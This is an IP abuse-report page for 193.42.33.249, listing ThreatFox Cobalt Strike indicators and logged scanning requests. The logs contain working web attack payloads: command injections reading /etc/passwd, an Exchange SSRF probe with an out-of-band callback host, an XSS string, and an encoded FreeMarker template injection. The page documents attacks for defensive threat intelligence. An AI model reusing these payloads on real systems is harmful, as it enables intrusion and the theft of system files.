Log in to view charts and search reports for this IP.
Log In
No reports in the last 60 days
193.42.33.249 has been reported 73
times. The most recent report is from
.
The full history is preserved below and remains searchable. A
0% score reflects the absence of recent activity, but
this is not a guarantee that earlier reports were invalid. Abuse confidence score decays,
naturally, over time, when the abusive activity stops.
Added into the Abuse.ch ThreatFox IOC database by @drb_ra for being involved with the malware family ...
show moreAdded into the Abuse.ch ThreatFox IOC database by @drb_ra for being involved with the malware family Cobalt Strike with tags: CobaltStrike, cs-watermark-391144938, XDEER-AS-AP Xdeer Limited.
Source: https://threatfox.abuse.ch/ioc/1096529/
show less
Added into the Abuse.ch ThreatFox IOC database by @drb_ra for being involved with the malware family ...
show moreAdded into the Abuse.ch ThreatFox IOC database by @drb_ra for being involved with the malware family Cobalt Strike with tags: CobaltStrike, cs-watermark-391144938, XDEER-AS-AP Xdeer Limited.
Source: https://threatfox.abuse.ch/ioc/1094159/
show less
Added into the Abuse.ch ThreatFox IOC database by @drb_ra for being involved with the malware family ...
show moreAdded into the Abuse.ch ThreatFox IOC database by @drb_ra for being involved with the malware family Cobalt Strike with tags: CobaltStrike, cs-watermark-391144938, QuadraNet Enterprises LLC.
Source: https://threatfox.abuse.ch/ioc/1094100/
show less
Added into the Abuse.ch ThreatFox IOC database by @drb_ra for being involved with the malware family ...
show moreAdded into the Abuse.ch ThreatFox IOC database by @drb_ra for being involved with the malware family Cobalt Strike with tags: CobaltStrike, cs-watermark-391144938, XDEER-AS-AP Xdeer Limited.
Source: https://threatfox.abuse.ch/ioc/1093684/
show less
Added into the Abuse.ch ThreatFox IOC database by @drb_ra for being involved with the malware family ...
show moreAdded into the Abuse.ch ThreatFox IOC database by @drb_ra for being involved with the malware family Cobalt Strike with tags: CobaltStrike, cs-watermark-391144938, XDEER-AS-AP Xdeer Limited.
Source: https://threatfox.abuse.ch/ioc/1091548/
show less
POST /var HTTP/1.1 404 455 http://209.126.5.220 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHT ...
show morePOST /var HTTP/1.1 404 455 http://209.126.5.220 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
show less
{"Method":"GET","Path":"/cgi-bin/kerbynet?Action=StartSessionSubmit\u0026PW\u0026User='%0acat%20/etc ...
show more{"Method":"GET","Path":"/cgi-bin/kerbynet?Action=StartSessionSubmit\u0026PW\u0026User='%0acat%20/etc/passwd%0a'","Headers":{"Accept":"*/*","Accept-Encoding":"gzip","Accept-Language":"en","Connection":"close","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"},"Body":"","Ip":"193.42.33.249:53044"}
show less
{"Method":"GET","Path":"/maint/modules/home/index.php?lang=english|cat%20/etc/passwd","Headers":{"Ac ...
show more{"Method":"GET","Path":"/maint/modules/home/index.php?lang=english|cat%20/etc/passwd","Headers":{"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Accept-Encoding":"gzip","Accept-Language":"de,en-US;q=0.7,en;q=0.3","Authorization":"Basic bWFpbnQ6cGFzc3dvcmQ=","Cache-Control":"max-age=0","Connection":"close","User-Agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36"},"Body":"","Ip":"193.42.33.249:33322"}
show less
(mod_security) mod_security (id:960013) triggered by 193.42.33.249 (NL/Netherlands/-): 1 in the last ...
show more(mod_security) mod_security (id:960013) triggered by 193.42.33.249 (NL/Netherlands/-): 1 in the last 3600 secs (CF_ENABLE); Ports: *; Direction: 0; Trigger: LF_MODSEC; Logs: [Mon Feb 27 22:13:27.962025 2023] [security2:error] [pid 1517:tid 23180930455296] [client 193.42.33.249:55366] [client 193.42.33.249] ModSecurity: Access denied with code 406 (phase 2). Match of "rx ^$" against "REQUEST_HEADERS:Transfer-Encoding" required. [file "/etc/apache2/conf.d/webpods/01_base_rules.conf"] [line "24"] [id "960013"] [msg "ModSecurity does not support transfer encodings"] [severity "ERROR"] [tag "PROTOCOL_VIOLATION/EVASION"] [hostname "170.249.219.44"] [uri "/poc.jsp/"] [unique_id "Y_1xVx1wp9b3UFBR7S3PtgAAAQQ"]
show less
{"Method":"GET","Path":"/cgi-bin/weblogin.cgi?username=admin'cat+/etc/passwd","Headers":{"Accept":"* ...
show more{"Method":"GET","Path":"/cgi-bin/weblogin.cgi?username=admin'cat+/etc/passwd","Headers":{"Accept":"*/*","Accept-Encoding":"gzip","Accept-Language":"en","Connection":"close","User-Agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"},"Body":"","Ip":"193.42.33.249:48468"}
show less
{"Method":"GET","Path":"/owa/auth/x.js","Headers":{"Accept-Encoding":"gzip","Connection":"close","Co ...
show more{"Method":"GET","Path":"/owa/auth/x.js","Headers":{"Accept-Encoding":"gzip","Connection":"close","Cookie":"X-AnonResource=true; X-AnonResource-Backend=cfrbcab952g0buu01fh0b1dzpsbu41i7f.oast.pro/ecp/default.flt?~3;","User-Agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"},"Body":"","Ip":"193.42.33.249:47730"}
show less
{"Method":"GET","Path":"/owa/auth/frowny.aspx?app=people\u0026esrc=MasterPage\u0026et=ServerError\u0 ...
show more{"Method":"GET","Path":"/owa/auth/frowny.aspx?app=people\u0026esrc=MasterPage\u0026et=ServerError\u0026refurl=}}}alert(document.domain)//\u0026te=\\","Headers":{"Accept":"*/*","Accept-Encoding":"gzip","Accept-Language":"en","Connection":"close","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36"},"Body":"","Ip":"193.42.33.249:43774"}
show less
ThreatBook Intelligence: Zombie,Spam more details on https://threatbook.io/ip/193.42.33.249
2023-02- ...
show moreThreatBook Intelligence: Zombie,Spam more details on https://threatbook.io/ip/193.42.33.249
2023-02-27 03:12:43 /vcac/
2023-02-27 03:12:44 /vcac/?original_uri=http://158.101.143.228:8080%2Fvcac
2023-02-27 01:47:41 /catalog-portal/ui/oauth/verify?deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d&error
2023-02-27 04:00:47 /poc.jsp/
show less